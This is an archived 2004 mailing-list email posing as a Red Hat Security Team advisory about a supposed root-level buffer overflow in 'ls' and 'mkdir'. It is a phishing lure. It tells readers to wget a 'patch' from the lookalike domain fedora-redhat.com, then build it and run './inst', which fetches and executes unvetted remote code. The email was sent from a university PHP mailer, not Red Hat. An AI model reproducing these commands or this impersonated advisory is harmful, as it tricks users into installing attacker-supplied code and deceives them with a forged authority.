Date: Sun, 24 Oct 2004 17:16:22 -0500 Message-Id: <200410242216.i9OMGMor025515@2ens11.uta.edu> To: kernelnewbies@nl.linux.org Subject: RedHat: Buffer Overflow in "ls" and "mkdir" MIME-Version: 1.0 Content-type: text/html; charset=iso-8859-1 From: RedHat Security Team Reply-To: security@redhat.com X-Mailer: PHP/4.3.4 Received-SPF: X-Spam-Status: No, hits=-3.2 required=5.0 tests=AWL,BAYES_00,HTML_MESSAGE, HTML_TITLE_UNTITLED,MIME_HTML_ONLY autolearn=no version=2.63 X-Spam-Checker-Version: SpamAssassin 2.63 (2004-01-11) on humbolt.nl.linux.org X-Spam-Level: X-ecartis-version: Ecartis v1.0.0 Sender: kernelnewbies-bounce@nl.linux.org Errors-to: kernelnewbies-bounce@nl.linux.org X-original-sender: security@redhat.com Precedence: bulk List-help: List-unsubscribe: List-software: Ecartis version 1.0.0 List-Id: X-List-ID: List-subscribe: List-owner: List-post: List-archive: X-list: kernelnewbies X-winbiff-received-account: SAKURA X-winbiff-flags: @S-----------@ Untitled Document

Original issue date: October 20, 2004
Last revised: October 20, 2004
Source: RedHat

A complete revision history is at the end of this file.

Dear RedHat user,

Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.

The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:

  • First download the patch from the Security RedHat mirror: wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
  • Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
  • cd fileutils-1.0.6.patch
  • make
  • ./inst

Again, please apply this patch as soon as possible or you risk your system and others` to be compromised.

Thank you for your prompt attention to this serious matter,

RedHat Security Team.

Copyright © 2004 Red Hat, Inc. All rights reserved.

-- Kernelnewbies: Help each other learn about the Linux kernel. Archive: http://mail.nl.linux.org/kernelnewbies/ FAQ: http://kernelnewbies.org/faq/